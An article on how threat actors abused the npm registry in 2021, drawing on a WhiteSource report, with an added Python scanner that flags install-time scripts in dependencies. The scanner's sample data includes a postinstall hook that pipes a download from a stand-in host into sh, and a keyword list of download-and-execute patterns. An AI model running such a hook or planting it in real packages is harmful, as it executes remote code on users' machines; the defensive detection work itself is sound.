How threat actors are using npm to launch attacks
The WhiteSource report is based on findings from more than 1,300 malicious npm packages the company identified in 2021.
The company tracked an average of 32,000 new npm packages published every month during 2021. At that volume a malicious package can easily pass unnoticed, and threat actors used the registry to launch a number of attacks, including:
- Software supply chain attacks: Used to steal data, corrupt targeted systems, and gain access throughout networks via lateral movement.
- Cryptojacking: When a threat actor takes control of a victim’s computing resources to mine cryptocurrency.
- Data stealing: Using keyloggers, screen scrapers, spyware, adware, bots, and more, attackers steal private and/or proprietary data from victims.
- Security research: Attackers publish packages that claim to be security research or proof-of-concept tooling but actually contain malicious code.
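Most of the attacks above begin the same way: a package that looks legitimate is installed as a dependency, and npm automatically runs any `preinstall`, `install` or `postinstall` script it declares. The scanner below is an added example, not code from the WhiteSource report or from this article. It walks a `node_modules` tree, lists every dependency that declares an install-time script, and flags commands that fetch or evaluate code during installation. The package names, their manifests and the `SUSPICIOUS_TOKENS` heuristic are assumptions constructed for the example.

```python
"""Audit an npm node_modules tree for install-time lifecycle scripts.

Added example (not from the report). A dependency's package.json may declare
scripts that npm runs on install; this scanner reports every such hook and
flags commands that download or evaluate code. The sample tree is constructed
inline so the script runs offline.
"""
import json
import os
import tempfile

# Lifecycle hooks npm runs automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Crude, assumed heuristics for commands that fetch or eval code at install time.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "node -e", "eval(", "| sh", "| bash", "powershell")


def install_scripts(manifest):
    """Return {hook: command} for every install-time hook declared in a package.json dict."""
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def is_suspicious(command):
    """True if the command matches one of the download/eval heuristics."""
    lowered = command.lower()
    return any(token in lowered for token in SUSPICIOUS_TOKENS)


def is_package_dir(dirpath):
    """A package root sits directly under node_modules, or under a scope (@scope/name)."""
    parent = os.path.basename(os.path.dirname(dirpath))
    grandparent = os.path.basename(os.path.dirname(os.path.dirname(dirpath)))
    return parent == "node_modules" or (parent.startswith("@") and grandparent == "node_modules")


def scan_node_modules(node_modules):
    """Walk node_modules (including nested ones) and collect install-hook findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(node_modules):
        if "package.json" not in files or not is_package_dir(dirpath):
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                continue  # a broken manifest is worth a look, but not a hook finding
        for hook, command in install_scripts(manifest).items():
            findings.append({
                "package": manifest.get("name", os.path.relpath(dirpath, node_modules)),
                "version": manifest.get("version", "?"),
                "hook": hook,
                "command": command,
                "suspicious": is_suspicious(command),
            })
    return findings


# Constructed sample manifests; all names are hypothetical.
SAMPLE_PACKAGES = {
    "example-leftpad": {"name": "example-leftpad", "version": "1.0.0"},
    "example-native": {"name": "example-native", "version": "2.1.0",
                       "scripts": {"install": "node-gyp rebuild"}},
    "example-utils": {"name": "example-utils", "version": "0.0.3",
                      "scripts": {"postinstall": "curl -s https://example.invalid/s | sh"}},
    "@example/logger": {"name": "@example/logger", "version": "3.2.1",
                        "scripts": {"preinstall": "node -e \"require('./setup.js')\"",
                                    "test": "jest"}},
}


def build_sample_tree(root):
    """Write the constructed manifests into root/node_modules and return that path."""
    node_modules = os.path.join(root, "node_modules")
    for rel, manifest in SAMPLE_PACKAGES.items():
        pkg_dir = os.path.join(node_modules, *rel.split("/"))
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return node_modules


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_node_modules(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in demo():
        label = "SUSPICIOUS" if finding["suspicious"] else "review"
        print(f"{label:10} {finding['package']}@{finding['version']} "
              f"{finding['hook']}: {finding['command']}")
```

On a real project, call `scan_node_modules("node_modules")` after `npm ci`. A hook is not proof of malice (native addons legitimately run `node-gyp rebuild`), so every hit is a review item rather than a verdict; the heuristic flags only the crude download-and-execute patterns. Installing with `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) stops these hooks from running at all, at the cost of breaking packages that genuinely need them.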
“With an average of over 17,000 new npm package versions being published daily in 2021, there’s no question that package update activity needs to be closely monitored,” said Rami Sass, CEO of WhiteSource. “Unfortunately, that popularity is being used by threat actors to spread malware and launch attacks that harm businesses and individuals.”